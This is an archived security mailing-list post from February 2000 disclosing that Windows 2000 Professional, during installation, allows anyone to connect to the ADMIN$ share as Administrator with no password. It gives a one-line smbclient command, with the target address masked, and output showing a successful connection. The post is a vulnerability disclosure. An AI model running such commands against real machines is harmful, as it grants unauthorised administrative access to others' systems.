Windows 2000 installation process weakness

From: Stephane Aubert (Stephane.Aubertat_private)
Date: Tue Feb 15 2000 - 06:57:50 PST

  • Next message: Andrzej Bialecki: "Re: DDOS Attack Mitigation"

    Hi !
    
    During the installation process of Windows 2000 professionnal anyone
    can connect to the ADMIN$ share as ADMINISTRATOR whithout any password.
    
    Verification :
    
    % ./smbclient \\\\WINDOZE\\ADMIN$ -I xxx.yyy.zzz.ttt -U 'administrator' -d 0 -N
    Unable to open configuration file "/usr/local/samba/lib/smb.conf"!
    pm_process retuned false
    Can't load /usr/local/samba/lib/smb.conf - run testparm to debug it
    Domain=[GROAR] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager]
    smb: \>
    
    Regards,
    Stephane
    
    PS : smbclient is a part of SAMBA (http://www.samba.org/).
    
    --
    Stephane AUBERT                   -=-      Herve Schauer Consultants
    Stephane.Aubertat_private                            http://www.hsc.fr/
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:34:51 PDT